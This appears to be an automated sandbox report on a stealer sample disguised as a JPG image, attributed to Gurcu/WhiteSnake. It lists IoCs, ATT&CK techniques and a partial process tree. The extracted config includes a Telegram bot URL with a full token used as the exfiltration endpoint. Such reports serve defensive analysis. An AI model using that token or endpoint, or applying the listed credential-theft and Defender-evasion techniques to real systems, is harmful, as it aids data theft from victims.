gurcu | 1d87e401ddc024a9ab7521e7fb4b8b44bb54bdb833e6e9981e196ef90b6552ec

Resubmissions

13/04/2025, 19:26

250413-x5yyfssycw 10

13/04/2025, 19:26

250413-x5mkessybz 1

Analysis

max time kernel
344s
max time network
345s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
13/04/2025, 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG_20250413_131246_512.jpg
Size

181KB
MD5

703286b654cd9c54537e939017aa08ed
SHA1

35aef5149a6a4e168a2c92ca71341efe4ff6277f
SHA256

1d87e401ddc024a9ab7521e7fb4b8b44bb54bdb833e6e9981e196ef90b6552ec
SHA512

30751ad053f249f57851764ba8de113af89cd453726a6acb33c5ac0ff690ca97494331faacc176d7b95246b9d23bbde4d2c9f99cdc797f04bea633358057c39b
SSDEEP

3072:EqkijMJOP8Fy6ZEm4Ka0/DOvtguXB+oLMJ/iP9y7wlJaILQ9Ap9a67lXqB+bpcPz:EqkrOPGr4m/U6uxpIJaA7wjsepx7lXqz

Score

10^/10

gurcu collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8050477168:AAHBCRJ0cgHePX5EvRtfNqNtL4xXBDx4NRE/sendMessag

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Blocklisted process makes network request 1 IoCs

flow	pid	Process
90	1752	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4712	powershell.exe
4400	powershell.exe
4776	powershell.exe
3356	powershell.exe
872	powershell.exe
1752	PowerShell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
90	1752	PowerShell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Verification.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5256	powershell.exe
1692	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
3144	Verification.exe
4808	Verification.exe
1456	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe
4808	Verification.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
103	discord.com
104	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
95	ip-api.com
101	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5536	tasklist.exe
4572	tasklist.exe
4576	tasklist.exe
4780	tasklist.exe
3984	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1688	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00080000000241dc-282.dat	upx
behavioral1/memory/4808-286-0x00007FFB71810000-0x00007FFB71E74000-memory.dmp	upx
behavioral1/files/0x0004000000023853-307.dat	upx
behavioral1/files/0x0002000000023234-300.dat	upx
behavioral1/files/0x00020000000236d4-306.dat	upx
behavioral1/files/0x00020000000236ce-305.dat	upx
behavioral1/files/0x0004000000023696-304.dat	upx
behavioral1/files/0x0002000000023684-303.dat	upx
behavioral1/files/0x00040000000234da-302.dat	upx
behavioral1/files/0x0003000000023377-301.dat	upx
behavioral1/files/0x00070000000241ec-299.dat	upx
behavioral1/files/0x00070000000241eb-298.dat	upx
behavioral1/files/0x00070000000241ea-297.dat	upx
behavioral1/files/0x00080000000241ca-294.dat	upx
behavioral1/files/0x000f000000024033-293.dat	upx
behavioral1/files/0x000c000000024065-291.dat	upx
behavioral1/files/0x0002000000023364-289.dat	upx
behavioral1/memory/4808-313-0x00007FFB9AA00000-0x00007FFB9AA2B000-memory.dmp	upx
behavioral1/memory/4808-312-0x00007FFB9EB90000-0x00007FFB9EBA9000-memory.dmp	upx
behavioral1/memory/4808-309-0x00007FFBA2DA0000-0x00007FFBA2DAF000-memory.dmp	upx
behavioral1/memory/4808-308-0x00007FFB9ED40000-0x00007FFB9ED67000-memory.dmp	upx
behavioral1/memory/4808-319-0x00007FFB9A8A0000-0x00007FFB9A8C5000-memory.dmp	upx
behavioral1/memory/4808-321-0x00007FFB723B0000-0x00007FFB7252F000-memory.dmp	upx
behavioral1/memory/4808-323-0x00007FFB9B370000-0x00007FFB9B389000-memory.dmp	upx
behavioral1/memory/4808-325-0x00007FFBA2CF0000-0x00007FFBA2CFD000-memory.dmp	upx
behavioral1/memory/4808-331-0x00007FFB8B750000-0x00007FFB8B81E000-memory.dmp	upx
behavioral1/memory/4808-332-0x00007FFB70190000-0x00007FFB706C3000-memory.dmp	upx
behavioral1/memory/4808-330-0x00007FFB95C70000-0x00007FFB95CA3000-memory.dmp	upx
behavioral1/memory/4808-329-0x00007FFB71810000-0x00007FFB71E74000-memory.dmp	upx
behavioral1/memory/4808-334-0x00007FFB9AFC0000-0x00007FFB9AFD4000-memory.dmp	upx
behavioral1/memory/4808-336-0x00007FFBA25C0000-0x00007FFBA25CD000-memory.dmp	upx
behavioral1/memory/4808-338-0x00007FFB727F0000-0x00007FFB728A3000-memory.dmp	upx
behavioral1/memory/4808-365-0x00007FFB9A8A0000-0x00007FFB9A8C5000-memory.dmp	upx
behavioral1/memory/4808-501-0x00007FFB9B370000-0x00007FFB9B389000-memory.dmp	upx
behavioral1/memory/4808-548-0x00007FFB8B750000-0x00007FFB8B81E000-memory.dmp	upx
behavioral1/memory/4808-547-0x00007FFB95C70000-0x00007FFB95CA3000-memory.dmp	upx
behavioral1/memory/4808-550-0x00007FFB70190000-0x00007FFB706C3000-memory.dmp	upx
behavioral1/memory/4808-551-0x00007FFB71810000-0x00007FFB71E74000-memory.dmp	upx
behavioral1/memory/4808-566-0x00007FFB9AFC0000-0x00007FFB9AFD4000-memory.dmp	upx
behavioral1/memory/4808-565-0x00007FFB727F0000-0x00007FFB728A3000-memory.dmp	upx
behavioral1/memory/4808-564-0x00007FFBA25C0000-0x00007FFBA25CD000-memory.dmp	upx
behavioral1/memory/4808-557-0x00007FFB723B0000-0x00007FFB7252F000-memory.dmp	upx
behavioral1/memory/4808-587-0x00007FFB71810000-0x00007FFB71E74000-memory.dmp	upx
behavioral1/memory/4808-617-0x00007FFB70190000-0x00007FFB706C3000-memory.dmp	upx
behavioral1/memory/4808-623-0x00007FFB723B0000-0x00007FFB7252F000-memory.dmp	upx
behavioral1/memory/4808-627-0x00007FFB8B750000-0x00007FFB8B81E000-memory.dmp	upx
behavioral1/memory/4808-626-0x00007FFB95C70000-0x00007FFB95CA3000-memory.dmp	upx
behavioral1/memory/4808-625-0x00007FFBA2CF0000-0x00007FFBA2CFD000-memory.dmp	upx
behavioral1/memory/4808-624-0x00007FFB9B370000-0x00007FFB9B389000-memory.dmp	upx
behavioral1/memory/4808-622-0x00007FFB9A8A0000-0x00007FFB9A8C5000-memory.dmp	upx
behavioral1/memory/4808-621-0x00007FFB9ED40000-0x00007FFB9ED67000-memory.dmp	upx
behavioral1/memory/4808-620-0x00007FFB9EB90000-0x00007FFB9EBA9000-memory.dmp	upx
behavioral1/memory/4808-619-0x00007FFBA2DA0000-0x00007FFBA2DAF000-memory.dmp	upx
behavioral1/memory/4808-618-0x00007FFB9AA00000-0x00007FFB9AA2B000-memory.dmp	upx
behavioral1/memory/4808-616-0x00007FFB727F0000-0x00007FFB728A3000-memory.dmp	upx
behavioral1/memory/4808-615-0x00007FFBA25C0000-0x00007FFBA25CD000-memory.dmp	upx
behavioral1/memory/4808-614-0x00007FFB9AFC0000-0x00007FFB9AFD4000-memory.dmp	upx
behavioral1/memory/4808-602-0x00007FFB71810000-0x00007FFB71E74000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4832	cmd.exe
3916	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4100	cmd.exe
1796	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4456	WMIC.exe
2552	WMIC.exe
5840	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5052	systeminfo.exe

Kills process with taskkill 16 IoCs

defense_evasion

pid	Process
6024	taskkill.exe
3812	taskkill.exe
5828	taskkill.exe
4336	taskkill.exe
3448	taskkill.exe
4700	taskkill.exe
4352	taskkill.exe
4288	taskkill.exe
4396	taskkill.exe
2296	taskkill.exe
32	taskkill.exe
3296	taskkill.exe
3692	taskkill.exe
5804	taskkill.exe
4720	taskkill.exe
2504	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133890460321570737"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3916	PING.EXE

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
232	mspaint.exe
232	mspaint.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
5700	chrome.exe
5700	chrome.exe
1752	PowerShell.exe
1752	PowerShell.exe
4712	powershell.exe
4776	powershell.exe
4776	powershell.exe
4712	powershell.exe
4776	powershell.exe
4712	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
5256	powershell.exe
5256	powershell.exe
3240	powershell.exe
3240	powershell.exe
5256	powershell.exe
3240	powershell.exe
3356	powershell.exe
3356	powershell.exe
1000	powershell.exe
1000	powershell.exe
872	powershell.exe
872	powershell.exe
5068	powershell.exe
5068	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
232	mspaint.exe
232	mspaint.exe
232	mspaint.exe
232	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4964 wrote to memory of 3912	4964	chrome.exe	96
PID 4964 wrote to memory of 3912	4964	chrome.exe	96
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4728	4964	chrome.exe	97
PID 4964 wrote to memory of 4760	4964	chrome.exe	98
PID 4964 wrote to memory of 4760	4964	chrome.exe	98
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99
PID 4964 wrote to memory of 5032	4964	chrome.exe	99

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1732	attrib.exe
2720	attrib.exe
688	attrib.exe

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_20250413_131246_512.jpg"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:3296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb9b51dcf8,0x7ffb9b51dd04,0x7ffb9b51dd10
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1856,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1852 /prefetch:2
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2252,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2248 /prefetch:3
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2308 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:1320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4448 /prefetch:2
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5388,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:5772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,10057459556298939367,10908602451519646866,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5504 /prefetch:8
  2⤵
  PID:3380
- C:\Program Files\Google\Chrome\Application\chrome.exe
